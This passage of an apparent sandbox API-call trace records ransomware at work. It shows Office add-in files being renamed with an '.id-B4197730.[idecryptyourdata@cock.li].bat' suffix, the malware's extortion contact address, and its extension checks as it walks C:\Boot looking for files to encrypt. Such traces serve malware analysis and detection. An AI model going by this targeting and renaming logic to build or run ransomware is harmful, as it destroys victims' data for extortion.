Add-in\\lt\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\lt\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0176.624] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\lv\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\lv\\microsoft.analysisservices.excel.common.frontend.resources.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\lv\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.resources.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\lv\\microsoft.analysisservices.excel.common.frontend.resources.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0176.638] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Microsoft.AnalysisServices.Excel.BackEnd.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\microsoft.analysisservices.excel.backend.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Microsoft.AnalysisServices.Excel.BackEnd.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\microsoft.analysisservices.excel.backend.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0176.639] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\microsoft.analysisservices.excel.common.frontend.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Microsoft.AnalysisServices.Excel.Common.FrontEnd.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\microsoft.analysisservices.excel.common.frontend.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0176.641] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Microsoft.AnalysisServices.Modeler.UI.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\microsoft.analysisservices.modeler.ui.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Microsoft.AnalysisServices.Modeler.UI.rll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\microsoft.analysisservices.modeler.ui.rll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0178.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x703350 | out: hHeap=0x6a0000) returned 1 [0178.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x73b5c8 | out: hHeap=0x6a0000) returned 1 [0178.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x76c0e8 | out: hHeap=0x6a0000) returned 1 [0178.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x77c0f0 | out: hHeap=0x6a0000) returned 1 [0178.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3c59020 | out: hHeap=0x6a0000) returned 1 [0178.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x703338 | out: hHeap=0x6a0000) returned 1 [0178.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456ca90 [0178.897] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456ca90, Size=0x20) returned 0x458c240 [0178.897] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456ca90 [0178.897] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456ca90, Size=0x20) returned 0x458c178 [0178.898] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0178.898] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0178.898] Wow64DisableWow64FsRedirection (in: OldValue=0x317ff50 | out: OldValue=0x317ff50*=0x1) returned 1 [0178.898] lstrlenW (lpString="kernel32.dll") returned 12 [0178.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c178 | out: hHeap=0x6a0000) returned 1 [0178.898] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0178.898] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c240 | out: hHeap=0x6a0000) returned 1 Thread: id = 44 os_tid = 0xe7c [0155.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10000) returned 0x3d60048 [0155.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10000) returned 0x3d70050 [0155.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x7030e0 [0155.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6) returned 0x73b5d8 [0155.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703110 [0155.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100000) returned 0x3e66020 [0155.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703128 [0155.149] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x703128, Size=0x20) returned 0x6ddf70 [0155.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703128 [0155.149] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x703128, Size=0x20) returned 0x6dde80 [0155.150] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0155.150] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0155.150] Wow64DisableWow64FsRedirection (in: OldValue=0x327ff50 | out: OldValue=0x327ff50*=0x0) returned 1 [0155.150] lstrlenW (lpString="kernel32.dll") returned 12 [0155.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddf70 | out: hHeap=0x6a0000) returned 1 [0155.150] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0155.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dde80 | out: hHeap=0x6a0000) returned 1 [0155.150] Sleep (dwMilliseconds=0x64) [0155.521] Sleep (dwMilliseconds=0x64) [0155.779] Sleep (dwMilliseconds=0x64) [0156.295] Sleep (dwMilliseconds=0x64) [0156.909] lstrlenW (lpString="BCD") returned 3 [0156.909] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0156.909] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0156.909] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0156.909] lstrlenW (lpString=".doc") returned 4 [0156.909] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0156.909] lstrlenW (lpString=".docx") returned 5 [0156.909] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0156.909] lstrlenW (lpString=".pdf") returned 4 [0156.909] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0156.909] lstrlenW (lpString=".xls") returned 4 [0156.909] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0156.910] lstrlenW (lpString=".xlsx") returned 5 [0156.910] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0156.910] lstrlenW (lpString=".ppt") returned 4 [0156.910] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0156.910] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0156.910] lstrlenW (lpString=".zip") returned 4 [0156.910] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0156.910] lstrlenW (lpString=".rar") returned 4 [0156.910] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0156.910] lstrlenW (lpString=".bz2") returned 4 [0156.910] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0156.910] lstrlenW (lpString=".7z") returned 3 [0156.910] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0156.910] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0156.910] lstrlenW (lpString=".dbf") returned 4 [0156.910] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0156.910] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0156.910] lstrlenW (lpString=".1cd") returned 4 [0156.910] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0156.910] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0156.910] lstrlenW (lpString=".jpg") returned 4 [0156.910] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0156.911] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0156.911] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0156.911] lstrlenW (lpString=".doc") returned 4 [0156.911] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0156.911] lstrlenW (lpString=".docx") returned 5 [0156.911] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0156.911] lstrlenW (lpString=".pdf") returned 4 [0156.911] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0156.911] lstrlenW (lpString=".xls") returned 4 [0156.911] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0156.911] lstrlenW (lpString=".xlsx") returned 5 [0156.911] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0156.911] lstrlenW (lpString=".ppt") returned 4 [0156.911] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0156.911] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0156.911] lstrlenW (lpString=".zip") returned 4 [0156.911] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0156.911] lstrlenW (lpString=".rar") returned 4 [0156.911] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0156.911] lstrlenW (lpString=".bz2") returned 4 [0156.911] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0156.912] lstrlenW (lpString=".7z") returned 3 [0156.912] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0156.912] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0156.912] lstrlenW (lpString=".dbf") returned 4 [0156.912] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0156.912] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0156.912] lstrlenW (lpString=".1cd") returned 4 [0156.912] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0156.912] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0156.912] lstrlenW (lpString=".jpg") returned 4 [0156.912] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0156.912] lstrcmpiW (lpString1=".LOG1", lpString2=".bat") returned 1 [0156.912] lstrlenW (lpString="BCD.LOG1") returned 8 [0156.912] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0156.914] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x327ff14 | out: lpFileSize=0x327ff14*=0) returned 1 [0156.914] CloseHandle (hObject=0x340) returned 1 [0156.914] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0156.914] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0156.914] lstrlenW (lpString=".doc") returned 4 [0156.914] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0156.914] lstrlenW (lpString=".docx") returned 5 [0156.914] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0156.914] lstrlenW (lpString=".pdf") returned 4 [0156.914] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0156.914] lstrlenW (lpString=".xls") returned 4 [0156.914] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0156.914] lstrlenW (lpString=".xlsx") returned 5 [0156.914] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0156.914] lstrlenW (lpString=".ppt") returned 4 [0156.914] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0156.914] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0156.914] lstrlenW (lpString=".zip") returned 4 [0156.914] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0156.915] lstrlenW (lpString=".rar") returned 4 [0156.915] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0156.915] lstrlenW (lpString=".bz2") returned 4 [0156.915] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0156.915] lstrlenW (lpString=".7z") returned 3 [0156.915] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0156.915] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0156.915] lstrlenW (lpString=".dbf") returned 4 [0156.915] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0156.915] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0156.915] lstrlenW (lpString=".1cd") returned 4 [0156.915] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0156.915] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0156.915] lstrlenW (lpString=".jpg") returned 4 [0156.915] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0156.915] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0156.915] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0156.915] lstrlenW (lpString=".doc") returned 4 [0156.915] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0156.915] lstrlenW (lpString=".docx") returned 5 [0156.915] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0156.915] lstrlenW (lpString=".pdf") returned 4 [0156.916] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0156.916] lstrlenW (lpString=".xls") returned 4 [0156.916] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0156.916] lstrlenW (lpString=".xlsx") returned 5 [0156.916] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0156.916] lstrlenW (lpString=".ppt") returned 4 [0156.916] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0156.916] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0156.916] lstrlenW (lpString=".zip") returned 4 [0156.916] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0156.916] lstrlenW (lpString=".rar") returned 4 [0156.916] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0156.916] lstrlenW (lpString=".bz2") returned 4 [0156.916] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0156.916] lstrlenW (lpString=".7z") returned 3 [0156.916] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0156.916] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0156.916] lstrlenW (lpString=".dbf") returned 4 [0156.916] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0156.916] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0156.916] lstrlenW (lpString=".1cd") returned 4 [0156.916] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0156.916] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0156.916] lstrlenW (lpString=".jpg") returned 4 [0156.916] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0156.917] lstrcmpiW (lpString1=".LOG2", lpString2=".bat") returned 1 [0156.917] lstrlenW (lpString="BCD.LOG2") returned 8 [0156.917] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0156.917] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x327ff14 | out: lpFileSize=0x327ff14*=0) returned 1 [0156.917] CloseHandle (hObject=0x340) returned 1 [0156.917] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0156.917] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0156.917] lstrlenW (lpString=".doc") returned 4 [0156.917] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0156.918] lstrlenW (lpString=".docx") returned 5 [0156.918] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0156.918] lstrlenW (lpString=".pdf") returned 4 [0156.918] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0156.918] lstrlenW (lpString=".xls") returned 4 [0156.918] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0156.918] lstrlenW (lpString=".xlsx") returned 5 [0156.918] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0156.918] lstrlenW (lpString=".ppt") returned 4 [0156.918] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0156.918] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0156.918] lstrlenW (lpString=".zip") returned 4 [0156.918] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0156.918] lstrlenW (lpString=".rar") returned 4 [0156.918] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0156.918] lstrlenW (lpString=".bz2") returned 4 [0156.918] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0156.918] lstrlenW (lpString=".7z") returned 3 [0156.918] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0156.918] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0156.918] lstrlenW (lpString=".dbf") returned 4 [0156.919] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0156.919] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0156.919] lstrlenW (lpString=".1cd") returned 4 [0156.919] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0156.919] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0156.919] lstrlenW (lpString=".jpg") returned 4 [0156.919] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0156.919] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0156.919] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0156.919] lstrlenW (lpString=".doc") returned 4 [0156.919] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0156.919] lstrlenW (lpString=".docx") returned 5 [0156.919] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0156.919] lstrlenW (lpString=".pdf") returned 4 [0156.919] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0156.919] lstrlenW (lpString=".xls") returned 4 [0156.919] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0156.919] lstrlenW (lpString=".xlsx") returned 5 [0156.919] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0156.919] lstrlenW (lpString=".ppt") returned 4 [0156.920] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0156.920] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0156.920] lstrlenW (lpString=".zip") returned 4 [0156.920] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0156.920] lstrlenW (lpString=".rar") returned 4 [0156.920] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0156.920] lstrlenW (lpString=".bz2") returned 4 [0156.920] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0156.920] lstrlenW (lpString=".7z") returned 3 [0156.920] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0156.920] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0156.920] lstrlenW (lpString=".dbf") returned 4 [0156.920] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0156.920] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0156.920] lstrlenW (lpString=".1cd") returned 4 [0156.920] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0156.920] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0156.920] lstrlenW (lpString=".jpg") returned 4 [0156.920] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0156.921] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0156.921] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0156.921] CreateFileW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0156.921] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x327ff14 | out: lpFileSize=0x327ff14*=77664) returned 1 [0156.921] CloseHandle (hObject=0x340) returned 1 [0156.921] GetFileAttributesW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui")) returned 0x20 [0156.921] GetFileAttributesW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0156.933] CreateFileW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0156.933] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0156.933] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0156.933] lstrlenW (lpString=".doc") returned 4 [0156.933] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0156.933] lstrlenW (lpString=".docx") returned 5 [0156.933] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0156.933] lstrlenW (lpString=".pdf") returned 4 [0156.934] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0156.934] lstrlenW (lpString=".xls") returned 4 [0156.934] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0156.934] lstrlenW (lpString=".xlsx") returned 5 [0156.934] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0156.934] lstrlenW (lpString=".ppt") returned 4 [0156.934] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0156.934] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0156.934] lstrlenW (lpString=".zip") returned 4 [0156.934] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0156.934] lstrlenW (lpString=".rar") returned 4 [0156.934] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0156.934] lstrlenW (lpString=".bz2") returned 4 [0156.934] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0156.934] lstrlenW (lpString=".7z") returned 3 [0156.934] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0156.934] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0156.934] lstrlenW (lpString=".dbf") returned 4 [0156.934] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0156.934] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0156.934] lstrlenW (lpString=".1cd") returned 4 [0156.935] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0156.935] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0156.935] lstrlenW (lpString=".jpg") returned 4 [0156.935] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0156.935] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0156.935] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0156.935] lstrlenW (lpString=".doc") returned 4 [0156.935] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0156.935] lstrlenW (lpString=".docx") returned 5 [0156.935] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0156.935] lstrlenW (lpString=".pdf") returned 4 [0156.935] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0156.935] lstrlenW (lpString=".xls") returned 4 [0156.935] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0156.935] lstrlenW (lpString=".xlsx") returned 5 [0156.935] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0156.935] lstrlenW (lpString=".ppt") returned 4 [0156.935] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0156.935] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0156.935] lstrlenW (lpString=".zip") returned 4 [0156.936] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0156.936] lstrlenW (lpString=".rar") returned 4 [0156.936] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0156.936] lstrlenW (lpString=".bz2") returned 4 [0156.936] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0156.936] lstrlenW (lpString=".7z") returned 3 [0156.936] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0156.936] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0156.936] lstrlenW (lpString=".dbf") returned 4 [0156.936] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0156.936] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0156.936] lstrlenW (lpString=".1cd") returned 4 [0156.936] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0156.936] lstrlenW (lpString="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 29 [0156.936] lstrlenW (lpString=".jpg") returned 4 [0156.936] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0156.936] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0156.936] lstrlenW (lpString="memtest.exe.mui") returned 15 [0156.937] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0156.937] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x327ff14 | out: lpFileSize=0x327ff14*=45472) returned 1 [0156.937] CloseHandle (hObject=0x340) returned 1 [0156.937] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui")) returned 0x20 [0156.937] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\memtest.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0156.937] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0156.938] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0156.938] lstrlenW 